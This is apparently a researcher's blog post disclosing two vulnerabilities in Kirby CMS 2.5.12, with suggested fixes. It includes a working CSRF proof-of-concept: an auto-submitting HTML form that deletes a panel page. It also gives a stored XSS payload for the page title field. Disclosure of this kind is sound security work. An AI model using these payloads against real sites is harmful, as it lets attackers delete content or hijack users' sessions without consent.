Sunday, July 22, 2018

Cross Site Request Forgery - Kirby CMS

Cross Site Request Forgery - Kirby CMS
By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.
Title of the Vulnerability:  Stored XSS
Vulnerability Class: Web Application Exploits.

Technical Details & Description: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.

CVE ID allocated: - Undisclosed.

Product & Service Introduction: Kirby CMS

Steps to Re-Produce –
1.       Visit the application
2.       Go to add page option
3.       Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted
4. Payload:
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


Exploitation Technique: A attacker can inject perform severe actions including account takeover.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss,privilege escalation etc.

Affected Product Version:  Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement anti csrf tokens.

POCs:




Stored XSS - Kirby CMS

By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Stored Cross Site Scripting

Title of the Vulnerability:  Stored XSS
Vulnerability Class: Web Application Exploits.

Technical Details & Description: The application allows user injected payload which can lead to Stored Cross Site Scripting.

CVE ID allocated: - Undisclosed.

Product & Service Introduction: Kirby CMS

Steps to Re-Produce –
1.       Visit the application
2.       Go to add page option
3.       Under title, enter any XSS payload like: <script>alert("XSS");</script>
4.       Upon the payload being injected, the subsequent page is triggered with XSS.

Exploitation Technique: A attacker can inject malicious xss payloads to steal user data.
Severity Level: High
Security Risk:
The presence of such a risk can lead to data loss, xss shell uploads etc

Affected Product Version:  Kirby 2.5.12
Solution - Fix & Patch: The application code should be configured to implement strict input validation to prevent XSS payloads.

POCs: